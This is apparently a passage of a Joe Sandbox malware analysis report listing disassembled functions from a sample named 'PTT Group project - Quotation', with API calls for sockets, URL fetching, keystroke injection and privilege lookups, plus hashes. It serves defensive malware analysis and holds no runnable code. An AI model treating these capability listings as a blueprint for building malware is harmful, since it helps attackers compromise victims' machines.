Opcode Fuzzy Hash: 7dd6ab1c769ca87cd8fc9da482b5affd7369111c4c504f6ca85e757dde49daa9
Instruction Fuzzy Hash: 88512C35A01209AFDF10DF6CE880AAE7BB9FB55320F14815EF8159B290D735AD81DB90

Function 00986CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00986CE4
WSAGetLastError.WSOCK32(00000000), ref: 00986CF4

Part of subcall function 00919997: __itow.LIBCMT ref: 009199C2
Part of subcall function 00919997: __swprintf.LIBCMT ref: 00919A0C

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00986D58
WSAGetLastError.WSOCK32(00000000), ref: 00986D64

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: b6e9cca3e67dc493122c971a911d10226c2f2e76fbe3afd354d19c707eaf94dd
Instruction ID: d92a337598ba3fa4ac96c938477ec15f791bd3cbade65b681f49dd486ef67ec3
Opcode Fuzzy Hash: b6e9cca3e67dc493122c971a911d10226c2f2e76fbe3afd354d19c707eaf94dd
Instruction Fuzzy Hash: 1E41B375740204AFEB20BF28DC96F7A77E99F84B10F448419FA5A9F3D2DA719C408791

Function 0098672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0099F910), ref: 009867BA
_strlen.LIBCMT ref: 009867EC

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 5d75c2b3c95cc4dc4e0b0b54ac7c5bd450a94d5db65b79d64959a2990bb4fde4
Instruction ID: 2cabe741af412cb1f544499612065447ff0b4deeba5378976a7d6d86b8a5550d
Opcode Fuzzy Hash: 5d75c2b3c95cc4dc4e0b0b54ac7c5bd450a94d5db65b79d64959a2990bb4fde4
Instruction Fuzzy Hash: 49418531A04108AFCB14FBA4DCD5FEEB7A9AF84314F158165F81A9B391DB30AD41CB90

Function 0097BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0097BB09
GetLastError.KERNEL32(?,00000000), ref: 0097BB2F
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0097BB54
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0097BB80

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: d9c0bdb44bc9dd77895aaf4b02c13048d2853e5aee54adfc3e9a2f1e0e12a83e
Instruction ID: 4eae98cf3310ea97f49628677209211e3713394d8bd8f6726f18c3bf49ace4e5
Opcode Fuzzy Hash: d9c0bdb44bc9dd77895aaf4b02c13048d2853e5aee54adfc3e9a2f1e0e12a83e
Instruction Fuzzy Hash: 6D41253A300614DFCB11EF18C595A9DBBE1AF89310B09C488EC8A9B362CB34FD41DB91

Function 00998AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00998B4D

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 32ade3cf8c22ccbf8695ee7e9025799c58a3390ac1b989631d2642775e1108d3
Instruction ID: b4bc9f633416bf882656c83d4031641e1e498a499de772d5479d8910c94265df
Opcode Fuzzy Hash: 32ade3cf8c22ccbf8695ee7e9025799c58a3390ac1b989631d2642775e1108d3
Instruction Fuzzy Hash: 5931E4B4645208BFEF209F5CCC95FAF37A8EB07310F28491AFA55D76A1CE35A9809741

Function 0099ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0099AE1A
GetWindowRect.USER32(?,?), ref: 0099AE90
PtInRect.USER32(?,?,0099C304), ref: 0099AEA0
MessageBeep.USER32(00000000), ref: 0099AF11

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 006add62fc016308be1d4c2bf8557822a21b0209ae22f93c2f7f256070ad71b3
Instruction ID: f3124782d9004f8beea8250c66c6ccf3328d2a9b116c434e001a07e7c6db0c01
Opcode Fuzzy Hash: 006add62fc016308be1d4c2bf8557822a21b0209ae22f93c2f7f256070ad71b3
Instruction Fuzzy Hash: C2415D70604219DFCF11DF9CD884B69BBF5FB89350F1881AAE815DB251D730A941EF92

Function 00970FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00971037
SetKeyboardState.USER32(00000080,?,00000001), ref: 00971053
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 009710B9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0097110B

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 3878b4ee4f2a3c294908ce0ad437aa8d3901236e63f18718eedf7e044f10e572
Instruction ID: 243c5093ed809cd4c05478bd27c3c3024f7b0f2f589c56c924b3c78ce6d93864
Opcode Fuzzy Hash: 3878b4ee4f2a3c294908ce0ad437aa8d3901236e63f18718eedf7e044f10e572
Instruction Fuzzy Hash: 46315A32E44688AFFF348B6D8C05BF9BBADAB84310F04C21AF588921D1C37489C49756

Function 00971121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00971176
SetKeyboardState.USER32(00000080,?,00008000), ref: 00971192
PostMessageW.USER32(00000000,00000101,00000000), ref: 009711F1
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00971243

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: e29e7d64e79d31a538918667e400925b00ea2a1936a9fb8ef3f7e86a8ccf185b
Instruction ID: d531f786e376616e4f1978d6dfb21d9050983cb35dc9a744376792b598aa9998
Opcode Fuzzy Hash: e29e7d64e79d31a538918667e400925b00ea2a1936a9fb8ef3f7e86a8ccf185b
Instruction Fuzzy Hash: 77314832A4830CAFEF348A6D8C14BFABBAEAB89310F54C35BF598961D1C3384D549755

Function 00946415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0094644B
__isleadbyte_l.LIBCMT ref: 00946479
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009464A7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009464DD

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 79c9f15632aa9b91cc0df3c287cbdcbd48f35dbea21b979b605d21bca5d58414
Instruction ID: 57d3064d954afd13fde2166bb6622ce3bb2c8218051b7fa0f5d1b9e93068d4da
Opcode Fuzzy Hash: 79c9f15632aa9b91cc0df3c287cbdcbd48f35dbea21b979b605d21bca5d58414
Instruction Fuzzy Hash: 9931CFB1604246AFDF258F69C845FAA7BA9FF42310F154429F864871A1EB31DC90DB92

Function 00995175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00995189

Part of subcall function 0097387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00973897
Part of subcall function 0097387D: GetCurrentThreadId.KERNEL32 ref: 0097389E
Part of subcall function 0097387D: AttachThreadInput.USER32(00000000,?,009752A7), ref: 009738A5

GetCaretPos.USER32(?), ref: 0099519A
ClientToScreen.USER32(00000000,?), ref: 009951D5
GetForegroundWindow.USER32 ref: 009951DB

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 97d7f55c004eed10eb722c8ad9c598767649a0319c9e2d7fd55d6c0ead204537
Instruction ID: 63aeb04f2cba21f99b25aff260361c49ed531066326c663b17919546250bc551
Opcode Fuzzy Hash: 97d7f55c004eed10eb722c8ad9c598767649a0319c9e2d7fd55d6c0ead204537
Instruction Fuzzy Hash: 25313072A00108AFDB00EFA9C955AEFB7FDEF98300F11406AE415E7251DA759E45CBA1

Function 0099C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00912612: GetWindowLongW.USER32(?,000000EB), ref: 00912623

GetCursorPos.USER32(?), ref: 0099C7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0094BBFB,?,?,?,?,?), ref: 0099C7D7
GetCursorPos.USER32(?), ref: 0099C824
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0094BBFB,?,?,?), ref: 0099C85E

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 4aead767c5c74a1d7edc535da2681c345b087ebc30e7cd792d389e2298c7a004
Instruction ID: a3188362ea538d90059fbec4d8f8116d5295e26764faa726f39120e3a7d14ec6
Opcode Fuzzy Hash: 4aead767c5c74a1d7edc535da2681c345b087ebc30e7cd792d389e2298c7a004
Instruction Fuzzy Hash: A0317EB5600118BFCF15CF5DCC98EEABBBAEB49310F04406AF9058B261C7359D50EBA0

Function 00968B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00968652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00968669
Part of subcall function 00968652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00968673
Part of subcall function 00968652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00968682
Part of subcall function 00968652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00968689
Part of subcall function 00968652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0096869F

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00968BEB
_memcmp.LIBCMT ref: 00968C0E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00968C44
HeapFree.KERNEL32(00000000), ref: 00968C4B

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 8be49ca9b57334e8f7c70b5c1be7f310c393563e6d5578e5aa7f5e8968d049ed
Instruction ID: 7c3af37e9acc489da5d46c10019e83fa912659f227207b36d3483aa484ef0df8
Opcode Fuzzy Hash: 8be49ca9b57334e8f7c70b5c1be7f310c393563e6d5578e5aa7f5e8968d049ed
Instruction Fuzzy Hash: 65219D71E01209EFDB10DFA4C949BEFB7B8EF44354F144159E494A7240DB35AE06DBA0

Function 00930BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00930BF2

Part of subcall function 00915B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00977B20,?,?,00000000), ref: 00915B8C
Part of subcall function 00915B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00977B20,?,?,00000000,?,?), ref: 00915BB0

_fprintf.LIBCMT ref: 00930C29
OutputDebugStringW.KERNEL32(?), ref: 00966331

Part of subcall function 00934CDA: _flsall.LIBCMT ref: 00934CF3

__setmode.LIBCMT ref: 00930C5E

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 4e3ca8b9b34713895697a65d82365576c37b3add6ec437642a0e9ae62cacdf75
Instruction ID: 121635bd4240c0bace178784b6eb4fefc78416179d747d5283b6a866fbaf2921
Opcode Fuzzy Hash: 4e3ca8b9b34713895697a65d82365576c37b3add6ec437642a0e9ae62cacdf75
Instruction Fuzzy Hash: 2B110632A04208BACB04B7B89C47BFEBB6D9FC5320F15415AF204972D2DE256D859BD5

Function 00981A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00981A97

Part of subcall function 00981B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00981B40
Part of subcall function 00981B21: InternetCloseHandle.WININET(00000000), ref: 00981BDD

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: c2e68384e561da878cb4e4512df25a9d06e39a8dd0445f371deb1b671b2d2b9a
Instruction ID: 81a98a0f8e3b252c9180d76e9711710ac6c6be54cff4b7667b89cc120a218c38
Opcode Fuzzy Hash: c2e68384e561da878cb4e4512df25a9d06e39a8dd0445f371deb1b671b2d2b9a
Instruction Fuzzy Hash: 0F21A135205601BFEB15AF65CC01FBAB7ADFF84701F10041AFA56D6760EB75E812ABA0

Function 0096E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0096F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0096E1C4,?,?,?,0096EFB7,00000000,000000EF,00000119,?,?), ref: 0096F5BC
Part of subcall function 0096F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0096F5E2
Part of subcall function 0096F5AD: lstrcmpiW.KERNEL32(00000000,?,0096E1C4,?,?,?,0096EFB7,00000000,000000EF,00000119,?,?), ref: 0096F613

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0096EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0096E1DD
lstrcpyW.KERNEL32(00000000,?), ref: 0096E203
lstrcmpiW.KERNEL32(00000002,cdecl,?,0096EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0096E237

Strings

cdecl, xrefs: 0096E22E

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: d02ac6ef9244b6450a51f8c8327c90455af05c7716a7885fc0d553ee0a2ff513
Instruction ID: 5660c3c98e13bb498ee7df3c842a445a61b1e0aa60552492a5ed46926159a3f0
Opcode Fuzzy Hash: d02ac6ef9244b6450a51f8c8327c90455af05c7716a7885fc0d553ee0a2ff513
Instruction Fuzzy Hash: FF11D03A204301EFCB25AF68DC55E7A77AEFF84350B40402AF816CB2A4EB719850D7A0

Function 00945332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00945351

Part of subcall function 0093594C: __FF_MSGBANNER.LIBCMT ref: 00935963
Part of subcall function 0093594C: __NMSG_WRITE.LIBCMT ref: 0093596A
Part of subcall function 0093594C: RtlAllocateHeap.NTDLL(00FA0000,00000000,00000001,00000000,?,?,?,00931013,?), ref: 0093598F

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: cab99e4469db1f619b82bd5d332f85e072d79855f28d3c99c132f1fc56d8a0d2
Instruction ID: c7df83615b734e72526d6b65a442700a76c354f1442dc60ecc675b629191a8fd
Opcode Fuzzy Hash: cab99e4469db1f619b82bd5d332f85e072d79855f28d3c99c132f1fc56d8a0d2
Instruction Fuzzy Hash: 4C112372408B05EFCB313FB4AC01B6E37989F443E0F21052AF9049A092DE758D409B90

Function 00914531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00914560

Part of subcall function 0091410D: _memset.LIBCMT ref: 0091418D
Part of subcall function 0091410D: _wcscpy.LIBCMT ref: 009141E1
Part of subcall function 0091410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009141F1

KillTimer.USER32(?,00000001,?,?), ref: 009145B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 009145C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0094D6CE

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 6b39958a21d53fe3ea328962443684dfa76c8bb8fc5a293340d7f778156deccc
Instruction ID: f48758072bc7c923282b4b3344913b0c1c41c763659fcaf5a13a74f871684c6c
Opcode Fuzzy Hash: 6b39958a21d53fe3ea328962443684dfa76c8bb8fc5a293340d7f778156deccc
Instruction Fuzzy Hash: 3D212974A09788AFEB328B24CC55FE7BBED9F05308F04009EE69E96242C7741AC4DB51

Function 0098667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00915B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00977B20,?,?,00000000), ref: 00915B8C
Part of subcall function 00915B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00977B20,?,?,00000000,?,?), ref: 00915BB0

gethostbyname.WSOCK32(?,?,?), ref: 009866AC
WSAGetLastError.WSOCK32(00000000), ref: 009866B7
_memmove.LIBCMT ref: 009866E4
inet_ntoa.WSOCK32(?), ref: 009866EF

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
